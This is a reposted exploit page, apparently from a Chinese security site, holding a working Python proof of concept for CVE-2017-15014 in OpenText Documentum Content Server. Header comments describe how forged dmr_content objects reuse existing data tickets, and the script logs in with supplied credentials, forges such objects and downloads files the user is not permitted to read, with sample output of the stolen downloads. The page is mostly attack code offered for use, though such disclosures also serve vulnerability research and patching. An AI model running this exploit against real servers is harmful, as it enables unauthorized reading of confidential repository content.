首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opentext Documentum Content Server File Download
来源:andrew at panfilov.tel 作者:Panfilov 发布时间:2017-10-16  
#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains following design gap, which allows authenticated user to download arbitrary
# content files regardless attacker's repository permissions:
#
# when authenticated user upload content to repository he performs following steps:
# - calls START_PUSH RPC-command
# - uploads file to content server
# - calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET,
#    purposed to identify the location of the uploaded file on Content Server filesystem
# - further user creates dmr_content object in repository, which has value of data_ticket equal
#    to the value of DATA_TICKET returned at the end of END_PUSH_V2 call
#
# As the result of such design any authenticated user may create his own dmr_content object,
# pointing to already existing content of Content Server filesystem
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15014.py
# usage:
# CVE-2017-15014.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15014.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Trying to find any object with content...
# Querying "inaccessible" dmr_content objects...
# Downloaded 3959/3959 bytes of object 06024be980000133
# Downloaded 11280/11280 bytes of object 06024be980000135
# Downloaded 10004/10004 bytes of object 06024be980000138
# Downloaded 23692/23692 bytes of object 06024be98000017a
# Downloaded 19541/19541 bytes of object 06024be980000180
# Downloaded 1096/1096 bytes of object 06024be980000172
# Downloaded 11776/11776 bytes of object 06024be98000011f
# Downloaded 50176/50176 bytes of object 06024be980000125
# Downloaded 16384/16384 bytes of object 06024be98000012f
# Downloaded 985/985 bytes of object 06024be9800001f5
# Downloaded 191/191 bytes of object 06024be9800001fe
# Downloaded 213/213 bytes of object 06024be980000200
#



import socket
import sys

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']
    session.apply(None, NULL_ID, "BEGIN_TRANS")
    print "Querying \"inaccessible\" dmr_content objects..."
    for e in session.query(
            "SELECT * FROM dmr_content "
            "WHERE ANY parent_id IS NOT NULLID "
            "AND ANY parent_id NOT IN "
            "(SELECT r_object_id FROM dm_sysobject)"
    ):
        handle = 0
        try:
            content_id = session.next_id(0x06)
            obj = TypedObject(session=session)
            obj.set_string("OBJECT_TYPE", "dmr_content")
            obj.set_bool("IS_NEW_OBJECT", True)
            obj.set_int("i_vstamp", 0)
            obj.set_id("storage_id", e["storage_id"])
            obj.set_id("format", e["format"])
            obj.set_int("data_ticket", e["data_ticket"])
            obj.set_id("parent_id", object_id)
            if not session.save_cont_attrs(content_id, obj):
                print "Failed"
                exit(1)

            handle = session.make_puller(
                NULL_ID, obj["storage_id"], content_id,
                obj["format"], obj["data_ticket"]
            )
            if handle == 0:
                raise RuntimeError("Unable make puller")
            size = 0
            for chunk in session.download(handle):
                size += len(chunk)

            print "Downloaded %d/%d bytes of object %s" % \
                  (size, e['full_content_size'], e['r_object_id'])
        finally:
            if handle > 0:
                try:
                    session.kill_puller(handle)
                except:
                    pass


def create_session(host, port, user, pwd):
    print "Trying to connect to %s:%s as %s ..." % (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opentext Documentum Content Se
·Opentext Documentum Content Se
·Sync Breeze Enterprise 10.1.16
·Opentext Documentum Content Se
·Windows Escalate UAC Protectio
·Microsoft Edge Chakra JIT Inco
·Tomcat JSP Upload Bypass Remot
·Microsoft Edge Chakra JIT Fail
·Sync Breeze Enterprise 10.1.16
·Microsoft Edge Chakra StackScr
·ASX to MP3 3.1.3.7 - '.m3u' Bu
·Webmin 1.850 SSRF / CSRF / Cro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved